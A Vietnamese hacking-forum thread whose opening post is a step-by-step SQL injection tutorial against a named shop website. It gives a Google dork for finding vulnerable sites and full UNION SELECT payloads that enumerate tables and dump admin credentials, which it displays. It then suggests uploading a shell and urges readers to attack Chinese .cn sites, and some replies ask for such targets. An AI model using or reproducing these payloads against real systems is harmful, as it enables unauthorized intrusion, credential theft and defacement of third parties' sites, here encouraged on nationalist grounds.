Có thể bạn quan tâm


Đang tải thanh công cụ tìm kiếm ...

Trang 1/5 123 ... cuốicuối
Hiện kết quả từ 1 tới 10 của 44

[TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

Chủ đề được gửi trong chuyên mục Hacking Tutorials bởi JVL


  1. 30-03-2013, 09:43 AM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Đầu Tiên ! Xin Chào Mng ^_^ mình mới tham gia forum nên có gì ko đúng các pro chỉ thêm ^^!


    Tiếp theo ... Cần Chuẩn Bị :


    1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )


    2. 1 cái đầu và những ngón tay =]]z~


    Bây Giờ Tiến Hành Với Victim Nhé !


    Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )






    Đi 1 Vòng Site Tìm Link Có Dạng ?id=


    Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40





    Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :


    http://pscells.com/chitietsanpham.php?id=40'


    Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :





    Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)


    http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
    http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi


    Vậy : 5 < x < 10


    Tìm Tiếp :
    http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
    Vậy : 7 < x < 10
    Tiếp Nào :
    http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
    Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé


    Bây h Dùng Lệnh UNION SELECT để khai thác nó
    Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8


    Ta Sẽ Có Link :
    http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -


    Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xoq Vẫn Ko Thấy Gì ==> Cách Giải Quyết :


    Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :


    http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -


    Nếu Cột Nào Đó Từ 1 -> 8 Bị Lỗi Sẽ Xuất Hiện Như Hình :





    Vậy Cột 6 Bị Lỗi Nhé
    Bây giờ ta khai thác với lệnh như sau:


    http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -


    ( Thay Thế Group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Cách Table Có Trong Database )


    Và Sau Đó Ta Đc Các Table Của Database Như Hình :





    Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Troq Hình Là Table " Taikhoan "





    Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm "0x" ỡ đầu sẽ thành :
    0x7461696b686f616e <== Thay Mã Hex này Với Database() như Hình :







    Và Sửa Link ỡ 1 vài chỗ :


    http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -


    Thành


    http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e-- -


    Ta sẽ được:





    Tiếp theo lấy giá trị từ các column này ra ( Ko Cần Dùng Mã Hex Cho Các Tên Column Này )


    Đổi link ỡ 1 số chỗ :


    http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207c20,pass,0x207c20),7,8 from taikhoan-- -


    Lưu ý: Mã Hex 0x207c20 Là Mã Hex Của " | " Mình Đễ Vậy Để Phân Cách Các Giá Trị Sau Khi Get Cho Dễ Nhìn ^^! Ko Cần Thiết Lắm


    Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Khai Thác Như : taikhoan


    Và Ta Sẽ Đc Như Hình :





    Như hình trên. Ta được 1 ID Admin Là :


    ID: Admin
    Pass : @#123@#


    Số 1 Là Số User troq site ^^


    Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^ ^_^!!








    Thế Là Xoq Rồi Nhé ^^! Nếu Thích Bạn Cứ Úp Shell ( Mình Ko Khuyến Khích Các Bạn Deface ^_^ )


    Update Cho Các Bạn Thêm Video Của anh RaZoR đễ các bạn nắm rõ hơn ^^!





    Mong Các Bạn Đừng Dùng Để Phá Hoại Site VN


    Tìm Những Site TQ Có Đuôi Là .cn mà quậy =]]z~


    Nguồn : Học Ỡ các forum IT rồi tự viết tut


    - JVL -
  2. 17 Thành viên dưới đây đã cảm ơn cho bài viết rất có ích của JVL :

    "Lạnh Lùng" (30-03-2013),A.Z.K (30-03-2013),duonganh169 (03-04-2013),duongbka1 (30-03-2013),duyweb (30-03-2013),KENICHI (18-07-2013),longbear (03-04-2013),lvatrung (05-04-2013),manhtuan165 (03-04-2013),MrT_TranTu (30-03-2013),NeverStop (30-03-2013),One (10-04-2013),PhongKK (30-03-2013),phu.phu51 (30-03-2013),Sầu Tím (30-03-2013),vbbvietnam.com (30-03-2013),zajzajvp (30-03-2013)

  3. 30-03-2013, 02:41 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    mấy khoản hack hiếc mình lười lắm
  4. 30-03-2013, 03:01 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Lên home kìe
    Kzic.NET - Cộng đồng đam mê bảo mật!!!
    Hack.Kzic.NET - Trang công cụ cho Hacking & Security
    File.Kzic.NET - Upload File Miễn Phí
  5. 30-03-2013, 03:45 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Trích Nguyên văn bởi toanzoom Xem bài viết
    mấy khoản hack hiếc mình lười lắm
    mình cũng lười vậy ! Bấm Bàn Phím Ghi Đại Tut Chứ Có Biết Gì Đâu
  6. 30-03-2013, 04:01 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Trích Nguyên văn bởi JVL Xem bài viết
    mình cũng lười vậy ! Bấm Bàn Phím Ghi Đại Tut Chứ Có Biết Gì Đâu
    hack mà ko biết ?!
  7. 30-03-2013, 04:04 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Trích Nguyên văn bởi ndkimhao Xem bài viết
    hack mà ko biết ?!
    ừ mình tép rêu lắm bạn à
  8. 30-03-2013, 05:07 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Kết câu này

    Mong Các Bạn Đừng Dùng Để Phá Hoại Site VN


    Tìm Những Site TQ Có Đuôi Là .cn mà quậy =]]z~
  9. 3 Thành viên dưới đây đã cảm ơn cho bài viết rất có ích của NL-Ozon :

    jenovaooo (03-04-2013),namchelsea (08-10-2013),phodiu.net (30-03-2013)

  10. 30-03-2013, 05:51 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    bác cho vài cái site TQ để ae quẩy nào
    Mong Các Bạn Đừng Dùng Để Phá Hoại Site VN


    Tìm Những Site TQ Có Đuôi Là .cn mà quậy =]]z~

  11. Thành viên dưới đây đã cám ơn bài viết này của kill :

    phodiu.net (30-03-2013)

  12. 30-03-2013, 06:55 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Nếu site mà dùng url_rewrite thì làm thế nào bác (thường thì nó nếu chèn kí tự đặc biệt trên đường dẫn, nó chuyển sang 404 luôn, ko cho bác show ra lỗi đâu )
    Chưa tính làm sao biết đc folder admin, cho dù biết được thì có thằng quản trị nào mà ko đặt htaccess htpasswd hả bác ^^!
  13. 30-03-2013, 07:16 PM

    [TUT] Hack SQLi Injection Căn Bản Cho NewBie :D

    Đánh dấu phát, vài bữa nữa ngâm cứu
  14. Thành viên dưới đây đã cám ơn bài viết này của NeverStop :

    thanhlong71086 (21-04-2013)

Trang 1/5 123 ... cuốicuối

Facebook comment

Thông tin đề tài

Users Browsing this Thread

Hiện đang có 1 người đang xem bài viết này. (0 thành viên và 1 khách)

Visitors found this page by searching for:

Sqli

hack sql injection php

khai thác sql injection

huong dan hack shop

site sql cho newbie

huong dan hack website

huong dan sqli

sql injection

tut học sqlisqli cơ bảnhuong dan sql injectionhuong dan hacker co banhack shoptut sqlihuong dan hack shop can bantut hack shopkhai thác lỗi sql injectionhuong dan hack shop sql injectionhuong dan hack web phphack shop sql injectionhack web bang sql injectionsqli cơ bảnhack web sql injectioncách xem table liên quan khi khai thác sqlihack website php